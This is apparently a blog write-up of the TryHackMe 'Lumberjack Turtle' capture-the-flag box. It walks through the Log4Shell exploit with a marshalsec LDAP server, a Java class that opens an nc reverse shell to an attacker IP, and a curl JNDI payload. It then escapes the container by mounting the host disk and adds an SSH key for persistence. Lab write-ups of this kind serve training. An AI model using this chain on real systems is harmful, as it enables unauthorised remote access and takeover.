No logs, no crime… so says the lumberjack.
Lumberjack turtle is a Tryhackme box and log4j is in the spotlight.
Perfect training to exploit CVE-2021-44228 vulnerability
Command :
nmap -T5 -sV -p- 10.10.239.165
Only port 80 is open. We will enumerate the existing directories on the target with Dirb
Command :
dirb http://10.10.239.165
We have found a 1st directory, we will see if there is a second on this one.
Command :
dirb -u http://10.10.239.165/~logs
New directory found log4j. We will therefore have to exploit this flaw. Before seeing to get into it you have to see if the target is vulnerable.
This GitHub directory allows us to test if the target is vulnerable : https://github.com/fullhunt/log4j-scan
Command :
git clone https://github.com/fullhunt/log4j-scan
cd log4j-scan
pip3 install -r requirements.txt
Target scan :
python3.9 log4j-scan.py http:// 10.10.239.165/~logs/log4j
It’s vulnerable… At the same time, we suspected a little…
It was well hidden, but it’s worth it. It’s in the header of the /~logs/log4j page.
In the development tools ( f12 ), we can see the hint: X-THM-HINT CVE-2021-44228 against X-Api-Version
To exploit the flaw, there are several steps to put in place
You must first download this directory GitHub
Command :
git clone https://github.com/mbechler/marshalsec
cd marshalec
mvn clean package -DskipTests
Setting up the server :
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://YOUR.ATTACKER.IP.ADDRESS:8000/#Exploit
public class Exploit {
static {
try {
java.lang.Runtime.getRuntime().exec("nc 10.11.38.124 9999 -e /bin/bash");
} catch (Exception e) {
e.printStackTrace();
}
}
}
javac Exploit.java -source 8 -target 8
python3.9 -m http.server
nc -nlvp 9999
Everything is ready !!!!
curl -X GET http://10.10.239.165/~logs/log4j/ -H 'X-Api-Version: ${jndi:ldap://10.11.38.124:1389/Exploit\}'
We arrive on a shell, which cannot be upgraded. In any case, we are on a root account but in a content.
The 1st flag is at this location: /opt/
As for the Hamlet box (put the link), you have to go to /dev and see which disks are present.
Command :
cd /dev
ls -al | grep disk
Then, we have to mount xvda1.
Command :
mkdir /mnt/xvda1
mount /dev/xvda1 /mnt/xvda1
Once mounted, we have access to the entire system as root.
The 2nd flag is more difficult to find. It is easy to miss. You have to see the folder called «…»
Done !!!
It is possible to connect in ssh. Once the xvda1 volume is mounted, it is possible to add a public key in the authorized_keys file.
On Kali, you have to create a private/public key pair
Command :
ssh-keygen
Copy of the key id_rsa.pub :
echo ‘key here ‘ >> authorized_keys
That’s all folks
Thank you for taking the time to come to the site to read this Write-Up
I hope he has more for you and teaches you new things.
Feel free to leave a comment or share this article.